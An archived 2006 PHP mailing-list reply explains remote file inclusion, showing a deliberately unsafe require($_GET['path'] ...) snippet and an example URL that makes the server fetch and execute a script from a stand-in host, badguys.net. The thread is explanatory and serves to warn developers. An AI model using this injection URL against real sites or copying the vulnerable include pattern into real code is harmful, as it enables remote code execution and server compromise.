Re: Fwd: [PHP] Highjack?

---

• From: tedd@xxxxxxxxxxxx (tedd)
• Date: Tue, 14 Nov 2006 17:42:14 -0500

---

At 9:13 PM +0000 11/14/06, Stut wrote:

Ok, so badscript.php is a bad name for this script. Let's say show.php is a script you've written. You were tired, the kids were running around you screaming and shouting, and you wrote something like the following without really thinking about it...

<?php
require($_GET['path'].'commonfuncs.inc.php');
// Do other stuff here, using functions in commonfuncs.inc.php
?>

The *bad guy* can now hit the URL...

http://yoursite.com/show.php?path=http://badguys.net/injectionscript.txt?ignored=

This causes show.php to include (i.e. execute!!) the remote file injectionscript.txt from badguys.net at this URL...

http://badguys.net/injectionscript.txt?ignored=commonfuncs.inc.php

Since this gets executed on your server it can do anything one of your scripts can do. The only symptom would be that show.php will not work for that request. Do the bad guys care? Probably not, because by the time it fails they've already replaced your index.php and potentially installed a rootkit, backdoors and whatever else (depending, of course, on how locked down the web server is and your file permissions).

Hope that makes sense now.

-Stut

-Stut:

Yes, I believe that the "require($_GET[])" is one of the things Chris Shiflett talks about in his book. I should have guessed that was what everyone was talking about. But, considering that I never do that and my site was highjacked, I was thinking it must have been something different.

It all makes sense now.

Sorry for being so dense.

Thanks everyone.

tedd

PS: My kids are too old to scream -- it's grand-kids now.

--
-------
http://sperling.com http://ancientstones.com http://earthstones.com
.

---

• References:
  • RE: Fwd: [PHP] Highjack?
    • From: tedd
  • Re: Fwd: [PHP] Highjack?
    • From: Stut

• Prev by Date: php function like javas setTimeout??
• Next by Date: Simular un browser en php y autenticarse a la pagina dentro de una intranet con dominio
• Previous by thread: Re: Fwd: [PHP] Highjack?
• Next by thread: Re: Fwd: [PHP] Highjack?
• Index(es):
  • Date
  • Thread

---

Relevant Pages Re: OT: security ... this remote file will be included into ... the script and executed. ... Note that the remote server would have to ... Mechanisms such as the above allow attackers to execute any code they ... (comp.lang.php) Re: PHP web interface for shell script or command ... The Web server runs as 'nobody' which cannot be modified. ... read items off the file and execute the intended script running as the ... (comp.lang.php) Re: Fwd: [PHP] Highjack? ... On 14/11/06, tedd wrote: ... so badscript.php is a bad name for this script. ... >This causes show.php to include the remote file ... >(depending, of course, on how locked down the web server is and your ... (php.general) Re: tcl cgi script ... My goal is to setup a web server which will display home page. ... I click on a button in the homepage, server should execute some script ... root@autolite # cat index.html.en ... (comp.lang.tcl) Re: a question about perl scripts ... What permissions ... I am assuming read and execute. ... You entering the path to the script to run, ... web server address always refers to my ip through A records. ... (Fedora)

---

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(15)